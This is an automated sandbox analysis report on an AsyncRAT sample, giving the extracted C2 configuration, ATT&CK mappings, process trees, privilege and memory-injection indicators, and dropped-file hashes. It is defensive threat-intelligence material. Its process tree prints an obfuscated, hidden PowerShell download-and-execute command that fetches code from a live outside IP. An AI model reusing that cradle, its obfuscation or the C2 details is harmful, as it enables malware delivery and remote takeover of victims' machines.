asyncrat | 0476cdaf6b93168281968fcc06d78b3384de95e4df98e06290bdd63bb6a8b3f1

Analysis

max time kernel
142s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29/01/2025, 02:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0476cdaf6b93168281968fcc06d78b3384de95e4df98e06290bdd63bb6a8b3f1.wsf
Size

465KB
MD5

5cd92159ae3ab267e6b71d0a38b1a135
SHA1

3bca9b4d7c2405b75019737ebb5f28719b4d307a
SHA256

0476cdaf6b93168281968fcc06d78b3384de95e4df98e06290bdd63bb6a8b3f1
SHA512

2cfa54c21444c1b03336bdb49f92bd420c856a824ec0f85bb31b187f13e422d106a4ef72c2d2ee794c7dc34e540afd8c82914a5f9ba2f9754adb92476bbf1d02
SSDEEP

12288:WYlYlYlYlYlYlYlYlYlYlYlYRYlYlYlYlYlYlYlYlYlYlYlY0YlYlYlYlYlYlYle:h

Score

10^/10

asyncrat 00000001 discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

00000001

81.10.39.58:7077

Mutex

AsyncMutex_alosh

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	3628	WScript.exe
17	3008	powershell.exe
27	3008	powershell.exe
29	3008	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3764	powershell.exe
2508	powershell.exe
3008	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	api.ipify.org
27	api.ipify.org

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3764 set thread context of 4024	3764	powershell.exe	95
PID 2508 set thread context of 5048	2508	powershell.exe	108

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3008	powershell.exe
3008	powershell.exe
3764	powershell.exe
3764	powershell.exe
4024	aspnet_compiler.exe
2508	powershell.exe
2508	powershell.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeIncreaseQuotaPrivilege	3008	powershell.exe
Token: SeSecurityPrivilege	3008	powershell.exe
Token: SeTakeOwnershipPrivilege	3008	powershell.exe
Token: SeLoadDriverPrivilege	3008	powershell.exe
Token: SeSystemProfilePrivilege	3008	powershell.exe
Token: SeSystemtimePrivilege	3008	powershell.exe
Token: SeProfSingleProcessPrivilege	3008	powershell.exe
Token: SeIncBasePriorityPrivilege	3008	powershell.exe
Token: SeCreatePagefilePrivilege	3008	powershell.exe
Token: SeBackupPrivilege	3008	powershell.exe
Token: SeRestorePrivilege	3008	powershell.exe
Token: SeShutdownPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeSystemEnvironmentPrivilege	3008	powershell.exe
Token: SeRemoteShutdownPrivilege	3008	powershell.exe
Token: SeUndockPrivilege	3008	powershell.exe
Token: SeManageVolumePrivilege	3008	powershell.exe
Token: 33	3008	powershell.exe
Token: 34	3008	powershell.exe
Token: 35	3008	powershell.exe
Token: 36	3008	powershell.exe
Token: SeIncreaseQuotaPrivilege	3008	powershell.exe
Token: SeSecurityPrivilege	3008	powershell.exe
Token: SeTakeOwnershipPrivilege	3008	powershell.exe
Token: SeLoadDriverPrivilege	3008	powershell.exe
Token: SeSystemProfilePrivilege	3008	powershell.exe
Token: SeSystemtimePrivilege	3008	powershell.exe
Token: SeProfSingleProcessPrivilege	3008	powershell.exe
Token: SeIncBasePriorityPrivilege	3008	powershell.exe
Token: SeCreatePagefilePrivilege	3008	powershell.exe
Token: SeBackupPrivilege	3008	powershell.exe
Token: SeRestorePrivilege	3008	powershell.exe
Token: SeShutdownPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeSystemEnvironmentPrivilege	3008	powershell.exe
Token: SeRemoteShutdownPrivilege	3008	powershell.exe
Token: SeUndockPrivilege	3008	powershell.exe
Token: SeManageVolumePrivilege	3008	powershell.exe
Token: 33	3008	powershell.exe
Token: 34	3008	powershell.exe
Token: 35	3008	powershell.exe
Token: 36	3008	powershell.exe
Token: SeDebugPrivilege	3764	powershell.exe
Token: SeDebugPrivilege	4024	aspnet_compiler.exe
Token: SeDebugPrivilege	2508	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4024	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 3628 wrote to memory of 3008	3628	WScript.exe	82
PID 3628 wrote to memory of 3008	3628	WScript.exe	82
PID 2792 wrote to memory of 1548	2792	WScript.exe	86
PID 2792 wrote to memory of 1548	2792	WScript.exe	86
PID 1548 wrote to memory of 4108	1548	net.exe	88
PID 1548 wrote to memory of 4108	1548	net.exe	88
PID 2792 wrote to memory of 3404	2792	WScript.exe	89
PID 2792 wrote to memory of 3404	2792	WScript.exe	89
PID 3404 wrote to memory of 3764	3404	cmd.exe	91
PID 3404 wrote to memory of 3764	3404	cmd.exe	91
PID 3764 wrote to memory of 4024	3764	powershell.exe	95
PID 3764 wrote to memory of 4024	3764	powershell.exe	95
PID 3764 wrote to memory of 4024	3764	powershell.exe	95
PID 3764 wrote to memory of 4024	3764	powershell.exe	95
PID 3764 wrote to memory of 4024	3764	powershell.exe	95
PID 3764 wrote to memory of 4024	3764	powershell.exe	95
PID 3764 wrote to memory of 4024	3764	powershell.exe	95
PID 3764 wrote to memory of 4024	3764	powershell.exe	95
PID 1968 wrote to memory of 2828	1968	WScript.exe	102
PID 1968 wrote to memory of 2828	1968	WScript.exe	102
PID 2828 wrote to memory of 2852	2828	net.exe	104
PID 2828 wrote to memory of 2852	2828	net.exe	104
PID 1968 wrote to memory of 436	1968	WScript.exe	105
PID 1968 wrote to memory of 436	1968	WScript.exe	105
PID 436 wrote to memory of 2508	436	cmd.exe	107
PID 436 wrote to memory of 2508	436	cmd.exe	107
PID 2508 wrote to memory of 5048	2508	powershell.exe	108
PID 2508 wrote to memory of 5048	2508	powershell.exe	108
PID 2508 wrote to memory of 5048	2508	powershell.exe	108
PID 2508 wrote to memory of 5048	2508	powershell.exe	108
PID 2508 wrote to memory of 5048	2508	powershell.exe	108
PID 2508 wrote to memory of 5048	2508	powershell.exe	108
PID 2508 wrote to memory of 5048	2508	powershell.exe	108
PID 2508 wrote to memory of 5048	2508	powershell.exe	108

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0476cdaf6b93168281968fcc06d78b3384de95e4df98e06290bdd63bb6a8b3f1.wsf"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$YuJiUsIrCvyV='IeX(NeW-OBJeCT NeT.W';$ixMOjUWoumFH='eBCLIeNT).DOWNLO';$ABspIuyLCaMK='repoooos(''http://45.88.186.162/test//update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($YuJiUsIrCvyV+$ixMOjUWoumFH+$ABspIuyLCaMK);
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3008

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\2owaWicxHh.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2792
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\2owaWicxHh.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\2owaWicxHh.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3764
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4024

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\2owaWicxHh.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\2owaWicxHh.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\2owaWicxHh.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2508
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7e521614944a4b380196880d6e64c960

SHA1
fd6de407ee23a9adbd73b3cd981d00097b58e4b2

SHA256
a43c1a1768dc9b337b5c7e4bdd0147fdc784067e1b1a731b08dd068b5114e12c

SHA512
0ce7556131a62805c2db2277613e9e29119f275fc453e0d77cfa84c7c934deb6079b0d39aacbedb88497988ec67448a76cbb69d907fd6d5dd6e0cf1e80b4d174

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyfbd0fq.vje.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Music\2owaWicxHh.bat

Filesize
2KB

MD5
f7595af9c1853e5173973063cfec8042

SHA1
27bec035e289c1a03b14146e5e552d6e894c26e7

SHA256
a52d3fdd4c77f0fc52eb8e229f6c1f1f6e5edc1fe6b4c6f7dc83ceacbd53c68d

SHA512
7be3e81ac1ef01676b41f288184246f0a33e9dde3f2c5df5ce604096edef3deb8ae4c2c9028647be1287015998a5cb47a2802b52cc4382a0de88f4331d2c677b

Download Submit
C:\Users\Public\Music\2owaWicxHh.ps1

Filesize
453KB

MD5
3a5cef51404509a4ba61622481244b2e

SHA1
0c5c108ace9f2cb228116d25c8afbdc468263ba2

SHA256
d3f2567c64263c7db02755a792cff84a5b56c9f08a063343dd3edc4f69579629

SHA512
22f05305c8044a8d02c30b2a64e22235d7c0817670844ff396a4d66ec0f441803f0262f73e7b70f62f2729998173de370ead5df3fb62371cd663a7a2a81bbe2b

Download Submit
C:\Users\Public\Music\2owaWicxHh.vbs

Filesize
4KB

MD5
fc27e46a8333ee013f57c7b6f3c104b7

SHA1
ff24048a90c5f3db005120ac1447a901b0b94ba0

SHA256
4bb4847f7ab3327efb30bc0036dcf7d72f93e740eacecf80bf33aea1e97097e2

SHA512
a20205cb81a06dbc3ddbc70524586f7e3d2e7e08a1f5121b396fca13ea0f4055e9fac706247a7c2909ee7a69b2ace798ec82539845cd1d4fcb734c99861347a5

Download Submit
memory/3008-13-0x00007FFA494B0000-0x00007FFA49F71000-memory.dmp

Filesize
10.8MB

Download
memory/3008-19-0x00007FFA494B0000-0x00007FFA49F71000-memory.dmp

Filesize
10.8MB

Download
memory/3008-44-0x0000018924470000-0x0000018924998000-memory.dmp

Filesize
5.2MB

Download
memory/3008-1-0x00007FFA494B3000-0x00007FFA494B5000-memory.dmp

Filesize
8KB

Download
memory/3008-36-0x00007FFA494B3000-0x00007FFA494B5000-memory.dmp

Filesize
8KB

Download
memory/3008-37-0x00007FFA494B0000-0x00007FFA49F71000-memory.dmp

Filesize
10.8MB

Download
memory/3008-48-0x00007FFA494B0000-0x00007FFA49F71000-memory.dmp

Filesize
10.8MB

Download
memory/3008-12-0x00007FFA494B0000-0x00007FFA49F71000-memory.dmp

Filesize
10.8MB

Download
memory/3008-4-0x000001890AB50000-0x000001890AB72000-memory.dmp

Filesize
136KB

Download
memory/3008-41-0x00007FFA494B0000-0x00007FFA49F71000-memory.dmp

Filesize
10.8MB

Download
memory/3008-42-0x0000018923D70000-0x0000018923F32000-memory.dmp

Filesize
1.8MB

Download
memory/3008-43-0x00007FFA494B0000-0x00007FFA49F71000-memory.dmp

Filesize
10.8MB

Download
memory/3764-32-0x00000219D5570000-0x00000219D557C000-memory.dmp

Filesize
48KB

Download
memory/4024-33-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/4024-40-0x0000000005620000-0x000000000562A000-memory.dmp

Filesize
40KB

Download
memory/4024-39-0x0000000005680000-0x0000000005712000-memory.dmp

Filesize
584KB

Download
memory/4024-38-0x0000000005A50000-0x0000000005FF4000-memory.dmp

Filesize
5.6MB

Download